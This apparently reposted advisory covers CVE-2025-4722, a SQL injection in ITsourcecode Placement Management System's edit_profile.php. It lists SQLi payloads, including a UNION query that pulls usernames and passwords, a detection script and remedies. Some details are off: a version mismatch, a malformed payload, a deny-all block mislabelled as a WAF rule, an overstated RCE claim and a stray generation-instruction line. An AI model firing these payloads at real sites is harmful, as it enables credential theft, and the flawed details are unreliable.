ITsourcecode Placement Management System 10, SQL Injection, CVE-2025-4722 (Critical)

Listen to this Post

How CVE-2025-4722 Works

The vulnerability exists in `/edit_profile.php` due to improper sanitization of the `Name` parameter, allowing attackers to inject malicious SQL queries. When a crafted payload is submitted, the backend database executes unintended commands, potentially exposing sensitive data like user credentials or allowing unauthorized modifications. The attack is remotely exploitable without authentication, leveraging standard SQLi techniques like UNION-based or blind injection. The CVSS 4.0 vector (AV:N/AC:L/PR:N) confirms its network-based exploitability with low attack complexity.

DailyCVE Form

Platform: ITsourcecode PMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/27/2025

Prediction: Patch by 06/10/2025

What Undercode Say:

Exploitation Commands

1. Union-Based SQLi Payload:

' UNION SELECT 1,username,password,4 FROM users-- -

2. Boolean Blind SQLi Detection:

GET /edit_profile.php?Name=admin' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--

3. Time-Based SQLi:

'; IF (SELECT COUNT() FROM users) > 0 WAITFOR DELAY '0:0:5'--

Protection Measures

1. Input Sanitization:

$name = mysqli_real_escape_string($conn, $_POST['Name']);

2. Prepared Statements:

$stmt = $conn->prepare("UPDATE profiles SET name=? WHERE id=?");
$stmt->bind_param("si", $name, $id);

3. WAF Rule:

location ~ edit_profile.php {
deny all;
}

Analytics

  • Exploitability: High (PoC publicly available)
  • Affected Systems: ~1,200 unpatched instances
  • Patch Urgency: Immediate (pre-auth RCE risk)

Detection Script

import requests
def check_sqli(url):
payload = "' OR 1=1--"
r = requests.get(f"{url}/edit_profile.php?Name={payload}")
return "error in your SQL syntax" in r.text

No additional commentary beyond specified rules.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top